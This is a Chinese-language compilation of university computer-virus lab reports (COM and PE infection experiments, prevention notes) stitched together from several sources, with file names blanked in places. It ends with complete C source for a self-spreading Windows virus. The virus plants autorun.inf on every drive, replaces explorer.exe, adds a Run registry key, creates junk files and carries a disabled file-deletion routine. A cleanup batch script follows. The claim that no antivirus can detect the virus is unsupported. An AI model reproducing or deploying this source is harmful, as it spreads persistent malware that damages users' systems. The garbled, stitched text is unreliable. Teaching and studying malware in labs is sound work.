计算机病毒实验报告
计算机病毒的防范的实验报告

计算机病毒的防范随着计算机及计算机网络的发展,伴随而来的计算机病毒传播问题越来越引起人们的关注。
随因特网的流行,有些计算机病毒借助网络爆发流行,如CIH计算机病毒、“爱虫”病毒等,它们与以往的计算机病毒相比具有一些新的特点,给广大计算机用户带来了极大的损失。
当计算机系统或文件染有计算机病毒时,需要检测和消除。
但是,计算机病毒一旦破坏了没有副本的文件,便无法医治。
隐性计算机病毒和多态性计算机病毒更使人难以检测。
在与计算机病毒的对抗中,如果能采取有效的防范措施,就能使系统不染毒,或者染毒后能减少损失。
计算机病毒防范,是指通过建立合理的计算机病毒防范体系和制度,及时发现计算机病毒侵入,并采取有效的手段阻止计算机病毒的传播和破坏,恢复受影响的计算机系统和数据。
计算机病毒利用读写文件能进行感染,利用驻留内存、截取中断向量等方式能进行传染和破坏。
预防计算机病毒就是要监视、跟踪系统内类似的操作,提供对系统的保护,最大限度地避免各种计算机病毒的传染破坏。
计算机病毒的工作方式是可以分类的,防杀计算机病毒软件就是针对已归纳总结出的这几类计算机病毒工作方式来进行防范的。
当被分析过的已知计算机病毒出现时,由于其工作方式早已被记录在案,防杀计算机病毒软件能识别出来;当未曾被分析过的计算机病毒出现时,如果其工作方式仍可被归入已知的工作方式,则这种计算机病毒能被反病毒软件所捕获。
这也就是采取积极防御措施的计算机病毒防范方法优越于传统方法的地方。
计算机病毒防范工作,首先是防范体系的建设和制度的建立。
没有一个完善的防范体系,一切防范措施都将滞后于计算机病毒的危害。
计算机病毒防范体系的建设是一个社会性的工作,不是一两个人、一两家企业能够实现的,需要全社会的参与,充分利用所有能够利用的资源,形成广泛的、全社会的计算机病毒防范体系网络。
一.计算机病毒的技术预防措施下面总结出一系列行之有效的措施供参考。
1、新购置的计算机硬软件系统的测试新购置的计算机是有可能携带计算机病毒的。
东华大学计算机病毒实验二报告(计算机com病毒)资料

计算机病毒实验报告姓名:学号:老师:日期:实验二一、实验目的1、掌握COM病毒的传播原理。
2、掌握MASM611编译工具的使用。
二、实验内容1、安装MS-DOS 7.10环境。
虚拟机安装该环境亦可,步骤在此不再赘述。
2、在MS-DOS C:\MASM目录下安装MASM611,然后将binr目录下的link.exe复制到bin目录下。
3、在C:\MASM\Bin目录下建立del.txt文件,并且将“”和病毒代码2“virus.asm”复制到此目录下。
4、执行“”观察结果。
5、编译并连接“virus.asm”生成“virus.exe”,执行此exe文件以感染“”文件并且自动删除del.txt,而后执行“”可以发现感染后的结果。
三、实验环境MS-DOS 7.10MASM611四. 实验步骤与结果1、安装软盘和光盘镜像文件软盘:病毒代码_软盘.IMA光盘:MASM611S.ISO2. 在C:盘根目录下建立shiyan2目录,将软盘上的内容copy到该目录下。
3、.安装汇编编译环境运行光盘上的安装程序setup, 将汇编编译环境安装到C:\masm611目录下。
设置路径path=%path%;c:\masm611\bin;c:\masm611\binr。
因为是拷贝来的,文件大小与文件一样。
创建del.txt文件。
在C:shiyan2目录下编译、连接生成病毒程序virus.exe。
感染病毒。
虚拟机死机。
Reset重启虚拟机。
发现已被严重感染。
且感染后变得过大,无法读出其中内容。
而且del.txt文件已被删除。
五. 病毒代码分析仔细分析病毒代码virus.asm, 结合实验完成以下内容:i. 传染模块主要代码及传染过程说明;pop si ;得到当前地址IP->SImov bp,si ;保存当前地址push simov ah,9 ;(DS:DX)=指向字符串首址(字符串以"$"结尾)。
计算机病毒实验报告-1

病毒理论与防御技术实验报告2015年3月1日实验一:**********一、实验目的1)掌握PE文件格式。
2)了解PE病毒原理。
二、实验步骤1)阅读CVC杂志。
2)学习使用PE Explorer查看不同PE结构文件格式,如exe和dll。
3)文件型病毒演练。
a)实验测试的示例程序包由教师提供,解压后请从病毒包中取得Virus.exe拷贝在当前解压目录中即可运行病毒程序进行测试。
b)为了保持测试的一般性,我们采用的是一个常见的软件ebook;该测试包即为ebook安装目录下的所有程序。
c)测试时请依照软件提示进行,在测试中,我们发现该测试包还具有典型性特点:其中ebookcode.Exe 和 KeyMaker.exe 可以看成一组,它们在感染后能够明显的体现病毒的基本特征,故而杀毒软件Norton能够比较及时的查出是病毒程序;而ebookedit.exe 和 ebrand-it.exe 是另一类程序,它们在感染后很好地体现了病毒的隐藏的特征,在运行初期,杀毒程序很难查出其为病毒程序,只有在该程序感染其他可执行程序,在宿主程序中添加4k的节时,杀毒软件检测到该行为时才能判断是病毒程序。
三、思考题1、详细记录实验步骤、现象、问题。
实验现象:1)PE文件格式按节组织(section)->中病毒之后section number变多(多了一个IS节)中病毒之后Address of entry point程序入口点变化(调用子程序SUB_L0066D58B)2)中病毒文件中病毒文件也具有了感染其他文件的功能。
●病毒重定位:原因:病毒的生存空间就是宿主程序,而因为宿主程序的不同,所以病毒每次插入到宿主程序中的位置也不同。
那么病毒需要用到的变量的位置就无法确定。
这就是病毒首先要重定位的原因。
目的:找到基址举例:在几乎每个病毒的开头都用下面的语句:call deltadelta:pop ebp ;得到delta地址sub ebp,offset delta ;因为在其他程序中基址可能不是默认的所以需要重定位mov dword ptr [ebp+offset appBase],ebp;把扩展基址寄存器ebp中的内容(基址)存入内存appBase位置●API函数地址的获取:步骤:首先获得诸如kernel32.dll,user32.dll的基址,然后再找到真正的函数地址.2、写下你阅读CVC杂志后的读后感,你同意杂志的所表达的倾向吗,你觉得现阶段病毒肆虐和这样的倾向和认识有没有关系,为什么?CVC杂志很有意思,语言幽默,观点明确,并且总结了很多关于病毒的基础知识。
电脑病毒与防治实验报告

电脑病毒与防治实验报告电脑病毒是一种在计算机系统中传播并破坏数据或干扰正常运行的恶意软件。
在当今数字化社会,电脑病毒越来越成为人们日常生活中的一个隐患。
为了更好地了解电脑病毒的危害以及有效防治方法,我们进行了相关实验并撰写此报告。
### 实验目的通过实验,探讨电脑病毒对计算机系统的危害程度,以及采取何种方法可以有效防治电脑病毒的侵害。
### 实验材料1. 实验室计算机设备2. 各类电脑病毒样本3. 杀毒软件4. 防火墙软件### 实验步骤1. 收集各类型电脑病毒样本,包括文件病毒、网页病毒、邮件病毒等。
2. 将病毒样本分别输入实验室的计算机系统中,观察病毒对系统的影响。
3. 安装杀毒软件,并对感染病毒的计算机进行查杀和清除操作。
4. 启动防火墙软件,设置相关防护策略,阻止病毒入侵计算机系统。
5. 对比有无杀毒软件和防火墙软件的情况下,电脑系统的表现和安全性。
### 实验结果分析经过实验观察和对比分析,我们得出以下结论:1. 电脑病毒的危害程度较大,不仅会导致系统运行缓慢、文件丢失、数据泄露等问题,还可能对计算机系统进行破坏,使其无法正常使用。
2. 安装杀毒软件和启用防火墙软件是预防电脑病毒的有效措施。
杀毒软件可以及时查杀发现的病毒,防火墙软件可以阻止病毒入侵系统。
3. 电脑系统在有杀毒软件和防火墙软件保护下,运行更加稳定,数据更加安全,用户体验更好。
### 实验结论综上所述,电脑病毒对计算机系统的危害不可忽视,因此加强对电脑病毒的防治至关重要。
安装杀毒软件和防火墙软件是预防和治理电脑病毒的有效手段,建议广大用户定期更新杀毒软件和防火墙软件,并加强对网络安全的重视,保护个人和机构的信息安全。
通过本次实验,我们对电脑病毒及其防治方法有了更深入的了解,相信在未来的计算机使用中,将更加注重网络安全,提高电脑系统的安全防护意识。
愿我们的实验报告能为更多人提供有益的参考和启示。
东华大学计算机病毒PE病毒实验报告

计算机病毒实验报告姓名:学号:老师:日期:一.PE文件感染实验一:参照病毒感染PE文件的7个步骤,记录病毒是如何感染文件(文字和截屏形式)病毒感染文件过程(以感染文件KeyMaker.exe 为例):重定位,获得所有API地址:通过软件Stud_PE可查看可执行文件KeyMaker.exe的结构可查看文件内容:1.判断目标文件开始的两个字节是否为“MZ”:2.判断PE文件标记“PE”:3.判断感染标记,如果已被感染过则跳出继续执行宿主程序,否则继续:4.读取IMAGE_FILE_HEADER的NumberOfSections域,获得Data Directory(数据目录)的个数,(每个数据目录信息占8个字节):5.得到节表起始位置。
(数据目录的偏移地址+数据目录占用的字节数=节表起始位置)。
6.得到节表的末尾偏移(紧接其后用于写入一个新的病毒节信息)节表起始位置+节的个数*(每个节表占用的字节数28H)=节表的末尾偏移。
7.开始写入节表,感染文件:二:在掌握Stud_PE工具的基础上,比较文件感染前后有哪些变化。
感染前:感染后:由上两图可以看出,感染前后有4处发生了变化:1:PE文件头中入口点:感染病毒后KeyMaker.exe程序的入口点变成了病毒文件的入口点。
2:PointerToRawData域值,即该文件的偏移量发生了变化;3:imag的大小发生了变化;4:Number of sections的数量发生了变化。
由.exe文件感染前后变化可知,PE病毒感染过程即在文件中添加一个新节,把病毒代码和病毒执行后返回宿主程序的代码写入新添加的节中,同时修改PE文件头中入口点(AddressOfEntryPoint),使其指向新添加的病毒代码入口。
程序染毒后运行结果:1:首先执行病毒程序:2:病毒代码执行完后执行宿主程序:三:针对病毒源代码,指出与感染PE文件步骤相对应的程序段1.判断目标文件开始的两个字节是否为“MZ”。
计算机病毒实验报告_实验报告_

计算机病毒实验报告说明1.本课程作业报告是《计算机病毒与反病毒》课程成绩评定的重要依据,须认真完成。
2.报告内容严禁出现雷同,每位同学须独立完成。
若发现抄袭,抄袭者和被抄袭者本课程的成绩均以零分计。
3.要排版,格式应规范,截图一律采用JPG格式(非BMP格式)。
为避免抄袭,用图像编辑软件在截图右下角“嵌入”自己的学号或姓名。
实验报告的格式是否规范、截图是否嵌入了自己的学号或姓名,是评价报告质量的考量因素。
4.说明文字与实验截图相配合,若只有说明文字,或只有截图,则成绩为不及格。
5.只提交报告电子版。
在规定的日期内,通过电子邮件发送到[emailprotected],若三天之内没有收到内容为“已收到”的回复确认Email,请再次发送或电话联系任课老师。
6.为了便于归档,实验报告Word文档的命名方式是“学号姓名-计算机病毒实验报告.doc”,如“20xx12345张三-计算机病毒课程报告.doc”。
注意:提交报告截止日期以QQ群通知时间为准(一般在考试周下周周三),若因没有及时提交实验报告,导致课程成绩为“缺考”的,责任自负。
实验一程序的自动启动一、实验目的(1)验证利用注册表特殊键值自动启动程序的方法;(2)检查和熟悉杀毒软件各组成部分的自动启动方法。
二、实验内容与要求(1)在注册表自动加载程序主键中,添加加载目标程序键值(自己指派任意程序),重启操作系统,检查是否能自动成功加载目标程序。
罗列5或5个以上能自动启动目标程序的键值,并用其中某一个启动自己指派的程序。
(2)检查/分析你所使用的计算机中杀毒软件系统托盘程序、底层驱动程序等组成部分的自动启动方式。
三、实验环境与工具操作系统:Windows XP/Windows Vista/Windows 7工具软件:RegEdit.exe,AutoRuns,或其他注册表工具软件;杀毒软件四、实验步骤与实验结果一)按启动文件夹的方法1、“启动”文件夹是最常见的自启动文件夹。
计算机病毒实验报告

计算机病毒实验报告计算机病毒实验报告引言:计算机病毒是一种恶意软件,可以对计算机系统造成破坏和损失。
为了更好地了解计算机病毒的特点和对计算机系统的影响,我们进行了一系列的实验。
本报告将详细介绍我们的实验过程、结果和结论。
实验一:病毒传播方式我们首先研究了计算机病毒的传播方式。
通过在一个封闭的网络环境中模拟实验,我们发现计算机病毒主要通过电子邮件、可移动存储设备和互联网下载等方式进行传播。
这些传播方式都依赖于用户的不慎操作或者系统的漏洞。
实验二:病毒对系统性能的影响我们接着研究了计算机病毒对系统性能的影响。
在一个实验环境中,我们分别在未感染和感染病毒的计算机上进行了性能测试。
结果显示,感染病毒的计算机在运行速度、响应时间和网络连接方面都明显下降。
这是因为计算机病毒会占用系统资源、干扰正常的进程和网络通信。
实验三:病毒防护措施为了更好地保护计算机系统免受病毒攻击,我们进行了一系列的病毒防护措施实验。
我们测试了不同的杀毒软件和防火墙,并对其进行了性能和效果的评估。
结果显示,合适的杀毒软件和防火墙可以有效地检测和阻止病毒的传播,保护计算机系统的安全。
实验四:病毒对个人隐私的威胁除了对系统性能的影响,计算机病毒还可能对个人隐私造成威胁。
我们进行了一项实验,模拟了一个病毒窃取个人信息的场景。
通过在一台计算机中安装了一个窃取密码的病毒,我们发现该病毒能够成功获取用户的登录信息和敏感数据。
这个实验结果提醒我们,保护个人隐私是非常重要的,我们应该谨慎对待未知来源的文件和链接。
结论:通过一系列的实验,我们对计算机病毒有了更深入的了解。
计算机病毒的传播方式多种多样,主要依赖于用户的不慎操作和系统的漏洞。
感染病毒会导致计算机系统性能下降,并可能对个人隐私造成威胁。
为了保护计算机系统的安全,我们应该采取合适的病毒防护措施,如安装杀毒软件和防火墙,并且要时刻保持警惕,不轻易打开未知来源的文件和链接。
总结:计算机病毒是现代计算机系统中的一大威胁,对系统性能和个人隐私都有着巨大的影响。
计算机病毒实验报告

计算机病毒实验报告
《计算机病毒实验报告》
近年来,计算机病毒成为了网络安全的重要问题。
为了深入研究计算机病毒的特性和对网络系统的影响,我们进行了一系列的实验。
在实验中,我们选择了几种常见的计算机病毒样本,并对其进行了分析和测试。
首先,我们对这些病毒样本进行了静态分析,包括对其代码结构、功能特性和传播途径的研究。
通过反汇编和代码审查,我们成功地分析出了这些病毒的工作原理和传播方式。
我们发现,这些病毒样本大多采用了文件传播和网络传播的方式,利用漏洞和弱密码等手段感染目标系统。
其次,我们对这些病毒样本进行了动态分析,包括在受控环境下的运行实验和行为监测。
通过在虚拟机环境中模拟感染过程,我们成功地捕获了这些病毒的行为数据,并对其进行了深入分析。
我们发现,这些病毒样本在感染目标系统后,会对系统文件进行篡改、窃取用户信息或者发起网络攻击等恶意行为。
最后,我们对这些病毒样本进行了安全性测试,包括针对其传播途径和感染后的影响进行了模拟实验。
通过在受控网络环境中模拟病毒传播和感染过程,我们成功地验证了这些病毒的危害性,并提出了相应的防范措施和安全建议。
通过这些实验,我们深入了解了计算机病毒的特性和对网络系统的影响,为进一步加强网络安全提供了重要的数据支持和科学依据。
我们希望通过我们的研究成果,能够为网络安全领域的相关工作提供有益的参考和借鉴,共同维护网络安全和信息安全的大局。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
计算机病毒原理实验报告专业:信息安全班级:0903班姓名:学号:时间:2012年1月3日计算机病毒的传染机制:1.计算机病毒的传染方式所谓传染是指计算机病毒由一个载体传播到另一个载体,由一个系统进入另一个系统的过程。
这种载体一般为磁盘或磁带,它是计算机病毒赖以生存和进行传染的媒介。
但是,只有载体还不足以使病毒得到传播。
促成病毒的传染还有一个先决条件,可分为两种情况,或者叫做两种方式。
其中一种情况是,用户在进行拷贝磁盘或文件时,把一个病毒由一个载体复制到另一个载体上。
或者是通过网络上的信息传递,把一个病毒程序从一方传递到另一方。
这种传染方式叫做计算机病毒的被动传染。
另外一种情况是,计算机病毒是以计算机系统的运行以及病毒程序处于激活状态为先决条件。
在病毒处于激活的状态下,只要传染条件满足,病毒程序能主动地把病毒自身传染给另一个载体或另一个系统。
这种传染方式叫做计算机病毒的主动传染。
2.计算机病毒的传染过程对于病毒的被动传染而言,其传染过程是随着拷贝磁盘或文件工作的进行而进行的,而对于计算机病毒的主动传染而言,其传染过程是这样的:在系统运行时,病毒通过病毒载体即系统的外存储器进入系统的内存储器,常驻内存,并在系统内存中监视系统的运行。
在病毒引导模块将病毒传染模块驻留内存的过程中,通常还要修改系统中断向量入口地址(例如INT 13H或INT 21H),使该中断向量指向病毒程序传染模块。
这样,一旦系统执行磁盘读写操作或系统功能调用,病毒传染模块就被激活,传染模块在判断传染条件满足的条件下,利用系统INT 13H读写磁盘中断把病毒自身传染给被读写的磁盘或被加载的程序,也就是实施病毒的传染,然后再转移到原中断服务程序执行原有的操作。
计算机病毒的传染方式基本可分为两大类,一是立即传染,即病毒在被执行到的瞬间,抢在宿主程序开始执行前,立即感染磁盘上的其他程序,然后再执行宿主程序;二是驻留内存并伺机传染,内存中的病毒检查当前系统环境,在执行一个程序或D1R等操作时传染磁盘上的程序,驻留在系统内存中的病毒程序在宿主程序运行结束后,仍可活动,直至关闭计算机。
3.系统型病毒传染机理计算机软硬盘的配置和使用情况是不同的。
软盘容量小,可以方便地移动交换使用,在计算机运行过程中可能多次更换软盘;硬盘作为固定设备安装在计算机内部使用,大多数计算机配备一只硬盘。
系统型病毒针对软硬盘的不同特点采用了不同的传染方式。
系统型病毒利用在开机引导时窃获的INT 13控制权,在整个计算机运行过程中随时监视软盘操作情况,趁读写软盘的时机读出软盘引导区,判断软盘是否染毒,如未感染就按病毒的寄生方式把原引导区写到软盘另一位置,把病毒写入软盘第一个扇区,从而完成对软盘的传染。
染毒的软盘在软件交流中又会传染其他计算机。
由于在每个读写阶段病毒都要读引导区,既影响微机工作效率,又容易因驱动器频繁寻道而造成物理损伤。
系统型病毒对硬盘的传染往往是在计算机上第一次使用带毒软盘进行的,具体步骤与软盘传染相似,也是读出引导区判断后写入病毒。
4.文件型病毒传染机理当执行被传染的.COM或.EXE可执行文件时,病毒驻人内存。
一旦病毒驻人内存,便开始监视系统的运行。
当它发现被传染的目标时,进行如下操作:(1)首先对运行的可执行文件特定地址的标识位信息进行判断是否已感染了病毒;(2)当条件满足,利用INT 13H将病毒链接到可执行文件的首部或尾部或中间,并存入磁盘中;(3)完成传染后,继续监视系统的运行,试图寻找新的攻击目标。
文件型病毒通过与磁盘文件有关的操作进行传染,主要传染途径有:(1)加载执行文件文件型病毒驻内存后,通过其所截获的INT 21中断检查每一个加载运行可执行文件进行传染。
加载传染方式每次传染一个文件,即用户准备运行的那个文件,传染不到那些用户没有使用的文件。
(2)列目录过程一些病毒编制者可能感到加载传染方式每次传染一个文件速度较慢,不够过瘾,于是后来造出通过列目录传染的病毒。
在用户列硬盘目录的时候,病毒检查每一个文件的扩展名,如果是可执行文件就调用病毒的传染模块进行传染。
这样病毒可以一次传染硬盘一个于目录下的全部可执行文件。
DIR是最常用的DOS命令,每次传染的文件又多,所以病毒的扩散速度很快,往往在短时间内传遍整个硬盘。
对于软盘而言,由于读写速度比硬盘慢得多,如果一次传染多个文件所费时间较长,容易被用户发现,所以病毒“忍痛”放弃了一些传染机会,采用列一次目录只传染一个文件的方式。
(3)创建文件过程创建文件是DOS内部的一项操作,功能是在磁盘上建立一个新文件。
已经发现利用创建文件过程把病毒附加到新文件上去的病毒,这种传染方式更为隐蔽狡猾。
因为加载传染和列目录传染都是病毒感染磁盘上原有的文件,细心的用户往往会发现文件染毒前后长度的变化,从而暴露病毒的踪迹。
而创建文件的传染手段却造成了新文件生来带毒的奇观。
好在一般用户很少去创建一个可执行文件,但经常使用各种编译、连接工具的计算机专业工作者应该注意文件型病毒发展的这一动向,特别在商品软件最后生成阶段严防此类病毒。
实验所用病毒介绍:本病毒所具有的功能:1.在所有磁盘的根目录生成和autorun.inf文件2.生成病毒体:c:\windows\c:\windows\explorer.exec:\windows\system32\dllcache\explorer.exec:\windows\system\msmouse.dllc:\windows\system32\cmdsys.sysc:\windows\system32\mstsc32.exe3.病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在explorer.exe前启动4.修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run设置自启动项(此操作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)5.生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“资源管理器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。
6.连锁能力,将病毒体相连,实现相连复制更新7.使用进程不断调用进程,使得在任务管理里无法结束病毒进程8.不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建9.生成垃圾文件(DESTORY_感染_任意数字)5个于C盘下10.附带删除文件函数(为防止危害,本函数默认不执行)本病毒到目前为止任何杀毒软件都无法将其查杀本病毒单机默认使用对机器无害(破坏代码已屏蔽)提供病毒卸载程序(保存为X.BAT,双击运行即可卸载):病毒源程序:/* SVCHOST.C *//* SVCHOST.EXE *//* */#include<stdio.h> /*标准输入输出*/#include<string.h> /*字符串操作*/#include<stdlib.h> /*其它函数*/#include<process.h> /*进程控制*/#include<dir.h> /*目录函数*/#define SVCHOST_NUM 6 /*关键位置病毒复制数量*/#define RUBBISH_NUM 5 /*垃圾文件数量*/#define REMOVE_NUM 5 /*删除文件数*//*==========================================================*/ /*文件AUTORUN.INF内容:1.自动运行2.覆盖默认打开命令,使用病毒体作为新的打开方式3.覆盖默认资源管理器命令,使病毒体作为新的命令方式*/char *autorun={"[AutoRun]\nopen=\" /s\"\nshell\\open=打开(&O)\nshell\\open\\Command=\" /s\"\nshell\\explore=资源管理器(&X)\nshell\\explore\\Command=\" /s\""};/*==========================================================*/ /*添加注册表项:1.自动运行生成病毒体C:\windows\wjview3*/char*regadd={"REGEDIT4\n\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ Windows\\CurrentVersion\\Run]\n\"wjview32\"=\"C:\\\\windows\\\\/s\""};/*==========================================================*/ /*函数:复制文件复制源:infile目的地:outfile成功返回0,失败返回1*/int copy(char *infile,char *outfile){FILE *input,*output;char temp;if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen(outfile,"wb"))!=NULL)){while(!feof(input)){fread(&temp,1,1,input);fwrite(&temp,1,1,output);}fclose(input);fclose(output);return 0;}else return 1;}/*==========================================================*/ /*函数:通过explorer自动运行成功返回0,失败返回1,2*/int autorun_explorer(){FILE *input;if((input=fopen("c:\\windows\\system\\explorer.exe","rb"))!=NULL){fclose(input);remove("c:\\windows\\$temp$");remove("c:\\windows\\system32\\dllcache\\$temp$");return 1;}copy("c:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe");rename("c:\\windows\\explorer.exe","c:\\windows\\$temp$");rename("c:\\windows\\system32\\dllcache\\explorer.exe","c:\\windows\\system32\\dllc ache\\$temp$");if(copy("","c:\\windows\\explorer.exe")==0 &©("","c:\\windows\\system32\\dllcache\\explorer.exe")==0) return 0;elsereturn 2;}/*==========================================================*/ /*函数:添加注册表项成功返回0,失败返回1*/int add_reg(){FILE *output;if((output=fopen("$$$$$","w"))!=NULL){fprintf(output,regadd);fclose(output);spawnl(1,"c:\\windows\\regedit.exe"," /s $$$$$",NULL);}}/*==========================================================*/ /*函数:复制病毒+ Autorun.inf自动运行*/void copy_virus(){int i,k;FILE *input,*output;char*files_svchost[SVCHOST_NUM]={"","c:\\windows\\","c: \\windows\\system\\MSMOUSE.DLL","c:\\windows\\system32\\cmdsys.sys","c:\\win dows\\system32\\mstsc32.exe","c:\\windows\\explorer.exe"};char temp[2][20]={"c:\\","c:\\autorun.inf"};for(i=0;i<SVCHOST_NUM;i++){if((input=fopen(files_svchost[i],"rb"))!=NULL){fclose(input);for(k=0;k<SVCHOST_NUM;k++){copy(files_svchost[i],files_svchost[k]);}i=SVCHOST_NUM;}}for(i=0;i<SVCHOST_NUM;i++){if((input=fopen(files_svchost[i],"rb"))!=NULL){fclose(input);for(k=0;k<24;k++){copy(files_svchost[i],temp[0]);if((output=fopen(temp[1],"w"))!=NULL){fprintf(output,"%s",autorun);fclose(output);}temp[0][0]++;temp[1][0]++;}i=SVCHOST_NUM;}}}/*==========================================================*/ /*函数:制造垃圾文件*/void make_rubbish(){int i;FILE *output;srand(0);for(i=0;i<RUBBISH_NUM;i++){int n;char s[30];n=rand();sprintf(s,"C:\\DESTORY_感染_%d",n);if((output=fopen(s,"w"))!=NULL){fprintf(output,"%ld%s",n*n,s);fclose(output);}}}/*==========================================================*/ /*函数:删除文件*/void remove_files(){long done;int i;struct _finddata_t ffblk;char *remove_files[3]={"*.txt","*.doc","*.xls"};for(i=0;i<3;i++){if(_findfirst(remove_files[i],&ffblk)==-1) continue;while(!done){remove();_findnext(done,&ffblk);}_findclose(done);}}/*==========================================================*/ /*主程序使用DEV-CPP 32位C工程实现.C程序脱离命令行界面,于后台执行*/int main(int argc,char **argv){int contral=0;if(argc>1)if(strcmp(argv[1],"/s")==0)goto next1;autorun_explorer();spawnl(1,"c:\\windows\\system\\explorer.exe",NULL);next1:add_reg();copy_virus();make_rubbish();/* remove_files(); */spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL);return 0;}病毒卸载程序:@echo offecho SK-CHINA SVCHOST KILLERtaskkill /im mstsc32.exe /fdel c:\windows\del c:\windows\explorer.exedel c:\windows\system32\dllcache\explorer.exedel c:\windows\system\msmouse.dlldel c:\windows\system32\cmdsys.sysdel c:\windows\system32\mstsc32.exedel c:\del c:\autorun.infdel d:\del d:\autorun.infdel e:\del e:\autorun.infdel f:\del f:\autorun.infdel g:\del g:\autorun.infdel h:\del h:\autorun.infcopy c:\windows\system\explorer.exe c:\windows\explorer.execopy c:\windows\system\explorer.exe c:\windows\system32\dllcache\explorer.exe del c:\windows\system\explorer.exeecho FINISH!echo 如果本次清除后仍残留有病毒,请再次运行本程序pause。